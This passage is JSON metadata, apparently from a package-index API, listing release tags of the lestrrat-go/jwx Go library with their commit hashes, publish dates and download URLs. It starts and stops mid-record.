rat-go%2Fjwx/tags/v2.1.0/manifests"},{"name":"v1.2.29","sha":"1025f8eec3bd80c8d8f1be8f9cad989a5b78fd4b","kind":"commit","published_at":"2024-03-07T02:56:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.29","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29/manifests"},{"name":"v2.0.21","sha":"611d914efbccb0babbce54e48457070e12ab6498","kind":"commit","published_at":"2024-03-07T02:47:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21/manifests"},{"name":"v2.0.20","sha":"c3b3a177580a7aaa73a033706d0009871c49bd8d","kind":"commit","published_at":"2024-02-19T23:34:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20/manifests"},{"name":"v1.2.28","sha":"8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","kind":"commit","published_at":"2024-01-09T01:52:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.28","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28/manifests"},{"name":"v2.0.19","sha":"d69a721931a5c48b9850a42404f18e143704adcd","kind":"commit","published_at":"2024-01-09T01:44:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19/manifests"},{"name":"v1.2.27","sha":"611567baacc0ef42263708892a08533812324a14","kind":"commit","published_at":"2023-12-03T07:23:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.27","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27/manifests"},{"name":"v2.0.18","sha":"e75b7c8dcbf8e56ecfbeb17b8b3ffaa81a96914f","kind":"commit","published_at":"2023-12-03T06:57:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18/manifests"},{"name":"v2.0.17","sha":"c02af3ecf9f8248181ce98056d90cd96605dd658","kind":"commit","published_at":"2023-11-20T04:20:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17/manifests"},{"name":"v2.0.16","sha":"3e23a27c76861ce73ca605b10969ba7107ec7117","kind":"commit","published_at":"2023-10-30T23:18:36.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16/manifests"},{"name":"v2.0.15","sha":"8074e35522a552c4c974004c8cd57c02cb5fd8e8","kind":"commit","published_at":"2023-10-19T23:39:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15/manifests"},{"name":"v2.0.14","sha":"42d47a75de7858fc60492f617a6ec4a9eda7d8dd","kind":"commit","published_at":"2023-10-17T00:54:09.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14/manifests"},{"name":"v2.0.13","sha":"be93b3f4afa02a079e3f2ca94da6a29e828cc4ed","kind":"commit","published_at":"2023-09-26T09:15:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13/manifests"},{"name":"v2.0.12","sha":"466c2774000a594f12a57dcf788be4e58e83ce04","kind":"commit","published_at":"2023-08-10T02:55:19.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12/manifests"},{"name":"v2.0.11","sha":"6c41e3822485fc7e11dd70b4b0524b075d66b103","kind":"commit","published_at":"2023-06-14T08:15:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11/manifests"},{"name":"v1.2.26","sha":"d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","kind":"commit","published_at":"2023-06-14T08:09:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.26","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26/manifests"},{"name":"v2.0.10","sha":"8840ffd4afc5839f591ff0e9ba9034af52b1643e","kind":"commit","published_at":"2023-06-12T07:24:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10/manifests"},{"name":"v2.0.9","sha":"fccc52457a90ce00d625c3ed8d5d3443e903a91b","kind":"commit","published_at":"2023-03-21T03:29:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9/manifests"},{"name":"v2.0.8","sha":"7803b82f35c80ed24b6d8b730a11983f751904b8","kind":"commit","published_at":"2022-11-25T00:58:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8/manifests"},{"name":"v2.0.7","sha":"6e8e91832b11d1d13f53b5e0b9a49fcd10db1f27","kind":"commit","published_at":"2022-11-15T01:54:59.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7/manifests"},{"name":"v2.0.6","sha":"92950642291a3af54c5f1455ec68e76b390587ae","kind":"commit","published_at":"2022-08-25T13:19:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"c599c15c345121b1223fb7a744eaa07fdfe5e95e","kind":"commit","published_at":"2022-08-11T00:18:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"21f292826bf5f4cb76be98dcdfef9ce635835b5e","kind":"commit","published_at":"2022-07-19T05:24:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"650fe90d166ba9ada98474be3b9f6450701ffb71","kind":"commit","published_at":"2022-06-13T12:26:04.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"dc603b6e88971ce0c477c48fd8b77e84ffefb169","kind":"commit","published_at":"2022-05-23T12:58:39.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2/manifests"},{"name":"v1.2.25","sha":"ad8c29d1628435cdad008b5cbbfbe75f5bfc74ae","kind":"commit","published_at":"2022-05-23T12:48:33.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.25","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25/manifests"},{"name":"v2.0.1","sha":"0d365e4523faae8e9f3bbcbd5bc3a09cab951d49","kind":"commit","published_at":"2022-05-06T00:39:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1/manifests"},{"name":"v1.2.24","sha":"e38f677839edbeae5480e993d73eacb94f7af581","kind":"commit","published_at":"2022-05-05T01:00:31.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.24","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24/manifests"},{"name":"v2.0.0","sha":"8f97f606570bc3de90005ce3188824e7e7eff88a","kind":"commit","published_at":"2022-04-24T04:18:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta2","sha":"fd8fafc9fe0a7310d9dec456168a452d571c16b0","kind":"commit","published_at":"2022-04-16T06:50:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2/manifests"},{"name":"v1.2.23","sha":"baba5610e7fb53402e23c955edc10dbb25d73275","kind":"commit","published_at":"2022-04-13T09:52:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.23","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23/manifests"},{"name":"v2.0.0-beta1","sha":"0258045345942aed8b8694da94cfb5ab4dd3261c","kind":"commit","published_at":"2022-04-09T13:16:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1/manifests"},{"name":"v1.2.22","sha":"f4701e19d38b7fd1ede0ef785867e078016b516e","kind":"commit","published_at":"2022-04-08T11:18:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.22","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22/manifests"},{"name":"v2.0.0-alpha1","sha":"8a69aa2dd6b9a7a8284584cdd23acd96613c0866","kind":"commit","published_at":"2022-04-03T23:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1/manifests"},{"name":"v1.2.21","sha":"7b28f4c7fabe44249b77e058e5ca33c82b599d5e","kind":"commit","published_at":"2022-03-29T22:49:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21/manifests"},{"name":"v1.2.20","sha":"3fa12c9bedcebd03db23f61cfb65ae0b040bf211","kind":"commit","published_at":"2022-03-03T05:56:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20/manifests"},{"name":"v1.2.19","sha":"1c0a87feccf45c59a54ee3c9f2a995ab777953e7","kind":"commit","published_at":"2022-02-22T01:40:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19/manifests"},{"name":"v1.2.18","sha":"2ab72de258ac966aeec3cfb836209692ed345586","kind":"commit","published_at":"2022-01-23T00:22:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18/manifests"},{"name":"v1.2.17","sha":"300b79a15b99559ba7ad22e4275ecc99a07c359b","kind":"commit","published_at":"2022-01-12T10:10:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17/manifests"},{"name":"v1.2.16","sha":"9349cc843391834794d593c4daa1345de1ab357e","kind":"commit","published_at":"2022-01-12T05:29:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16/manifests"},{"name":"v1.2.15","sha":"5ded25fd0bf8f759a96a7ae3937df829d8e4777d","kind":"commit","published_at":"2022-01-06T23:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15/manifests"},{"name":"v1.2.14","sha":"de7d9bca43812abc4f630320f8632108ccfe34bf","kind":"commit","published_at":"2021-12-22T01:34:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14/manifests"},{"name":"v1.2.13","sha":"59f4c03c3e0aeb44f6b6a57fd96b90f9a679f880","kind":"commit","published_at":"2021-12-07T02:59:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13/manifests"},{"name":"v1.2.12","sha":"45e532bbe4ada174b16f5f170ea62d2c8d83ef77","kind":"commit","published_at":"2021-12-01T06:52:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12/manifests"},{"name":"v1.2.11","sha":"e371adc10f659fa05b064274ff549a8e0353d2b6","kind":"commit","published_at":"2021-11-13T15:34:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11/manifests"},{"name":"v1.2.10","sha":"09a4d070eb0ec840a33597a67a17e6cddb53da87","kind":"commit","published_at":"2021-11-09T09:16:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg: